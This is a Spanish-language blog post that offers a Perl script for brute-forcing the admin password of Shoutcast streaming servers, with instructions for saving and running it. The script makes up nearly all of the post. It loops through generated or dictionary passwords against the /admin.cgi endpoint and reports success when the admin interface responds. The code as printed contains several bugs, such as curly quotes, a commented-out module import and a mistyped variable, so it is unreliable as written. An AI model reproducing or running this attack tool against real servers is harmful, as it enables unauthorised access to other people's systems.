Archivado en: Scripts
Como dice el titulo del post, con este script en PERL (necesitas perl en linux ó active perl para Windows) podras atacar servidores shoutcast via fuerza bruta, la contraseña de estos server siempre es “admin” asi que no es tan tedioso ya que solo es forzar la contraseña y dependiendo tu conexion y tu PC saldra en x tiempo… ademas solo es de ponerlo en un bloc de notas y guardarlo con extension .pl… en linux lo mismo. solo se modifica la ruta de PERL en la cabecera
#!C:\perl\bin
##########################
# Shoutcast admin password bruteforce
#use IO::Socket;
system (“cls”);
#system (“gcc -o ./bin/hack ./src/hack.c”);
print “\n”;
$host=$ARGV[0];
$port=$ARGV[1];
$brute=$ARGV[2];
if(!$hostname)
{
print “\n”;
print “\t::: Outpost24 Security :::\n”;
print “David Jacoby – dj\@outpost24.com – www.outpost24.com\n\n”;
print “Usage: ./program <hostname> <port> [brute/dict]\n\n\n”;
}
else{};if ($brute eq “brute”)
{
for $pass (a .. zzzzzzzzzz)
{
system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\tAttacking $host using the following password: $pass\n”;
$EOL = “1512″;
$BLANK = $EOL;
$BLANK1 = $EOL;
$remote = IO::Socket::INET->new( Proto => “tcp”,
PeerAddr => $host,
PeerPort => $port,
);
unless ($remote) { die “cannot connect to http daemon on $host” }
$remote->autoflush(1);
print $remote “GET /admin.cgi?pass=$pass HTTP/1.1 $BLANK” .
“Host: pewp.hack.se:8000 $BLANK” .
“User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 $BLANK” .
“Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1 $BLANK” .
“Accept-Language: en-us, en;q=0.50 $BLANK” .
“Accept-Encoding: gzip, deflate, compress;q=0.9 $BLANK” .
“Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66 $BLANK” .
“Keep-Alive: 300 $BLANK” .
“Connection: keep-alive $BLANK” .
“Cache-Control: max-age=0 $BLANK” . $BLANK1;
while ( <$remote> )
{
if (/interface/)
{system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\t\t\t ::: SUCCESS :::\n\n”;
print “\t\t\t\t\t\tHostname: [$host]\n”;
print “\t\t\t\t\t\tPassword: [$pass]\n\n\n”;
exit 0
}
}
close $remote;
};
};if ($brute eq “dict”)
{
open (InFile, “./dict/dict.txt”) || die;
$count = 0;
while ($pass = <InFile>){
chop ($pass);use IO::Socket;
system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\tAttacking $host using the following password: $pass\n”;
$EOL = “1512″;
$BLANK = $EOL;
$BLANK1 = $EOL;
$remote = IO::Socket::INET->new( Proto => “tcp”,
PeerAddr => $host,
PeerPort => $port,
);
unless ($remote) { die “cannot connect to http daemon on $host” }
$remote->autoflush(1);
print $remote “GET /admin.cgi?pass=$pass HTTP/1.1 $BLANK” .
“Host: pewp.hack.se:8000 $BLANK” .
“User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 $BLANK” .
“Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1 $BLANK” .
“Accept-Language: en-us, en;q=0.50 $BLANK” .
“Accept-Encoding: gzip, deflate, compress;q=0.9 $BLANK” .
“Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66 $BLANK” .
“Keep-Alive: 300 $BLANK” .
“Connection: keep-alive $BLANK” .
“Cache-Control: max-age=0 $BLANK” . $BLANK1;while ( <$remote> )
{
if (/interface/)
{
system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\t\t\t ::: SUCCESS :::\n\n”;
print “\t\t\t\t\t\tHostname: [$host]\n”;
print “\t\t\t\t\t\tPassword: [$pass]\n\n\n”;
exit 0
}
}close $remote;
};
system (“cls”);
print “\n\n\n\n”;
print “\t\t\t\t\t\t ::: DAMN DAMN! :::\n\n”;
print “\t\t\t\t\t\tHostname: [$host]\n”;
print “\t\t\t\t\t\tPassword: UNABLE TO FIND PASSWORD!\n\n\n”;
exit 0};
Aún no hay comentarios por mucho
Deja un comentario
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <pre> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>
